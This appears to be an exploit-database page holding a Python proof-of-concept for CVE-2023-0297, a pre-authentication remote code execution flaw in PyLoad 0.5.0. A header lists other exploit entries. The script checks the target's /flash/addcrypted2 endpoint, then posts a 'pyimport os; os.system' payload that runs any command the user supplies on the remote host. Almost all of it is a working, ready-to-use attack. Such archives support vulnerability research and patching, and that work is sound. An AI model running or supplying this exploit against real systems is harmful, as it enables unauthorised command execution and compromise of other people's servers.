
8 changes to exploits/shellcodes/ghdb Nokia ASIKA 7.13.52 - Hard-coded private key disclosure SPIP v4.2.1 - Remote Code Execution (Unauthenticated) Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) Super Socializer 7.13.52 - Reflected XSS WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
53 lines
No EOL
1.7 KiB
Python
Executable file
53 lines
No EOL
1.7 KiB
Python
Executable file
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
|
|
# Date: 06-10-2023
|
|
# Credits: bAu @bauh0lz
|
|
# Exploit Author: Gabriel Lima (0xGabe)
|
|
# Vendor Homepage: https://pyload.net/
|
|
# Software Link: https://github.com/pyload/pyload
|
|
# Version: 0.5.0
|
|
# Tested on: Ubuntu 20.04.6
|
|
# CVE: CVE-2023-0297
|
|
|
|
import requests, argparse
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
|
|
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
|
|
arguments = parser.parse_args()
|
|
|
|
def doRequest(url):
|
|
try:
|
|
res = requests.get(url + '/flash/addcrypted2')
|
|
if res.status_code == 200:
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
print("[!] Maybe the host is offline :", e)
|
|
exit()
|
|
|
|
def runExploit(url, cmd):
|
|
endpoint = url + '/flash/addcrypted2'
|
|
if " " in cmd:
|
|
validCommand = cmd.replace(" ", "%20")
|
|
else:
|
|
validCommand = cmd
|
|
|
|
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
|
|
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
|
|
print('[+] The exploit has be executeded in target machine. ')
|
|
|
|
def main(targetUrl, Command):
|
|
print('[+] Check if target host is alive: ' + targetUrl)
|
|
alive = doRequest(targetUrl)
|
|
if alive == True:
|
|
print("[+] Host up, let's exploit! ")
|
|
runExploit(targetUrl,Command)
|
|
else:
|
|
print('[-] Host down! ')
|
|
|
|
if(arguments.url != None and arguments.cmd != None):
|
|
targetUrl = arguments.url
|
|
Command = arguments.cmd
|
|
main(targetUrl, Command) |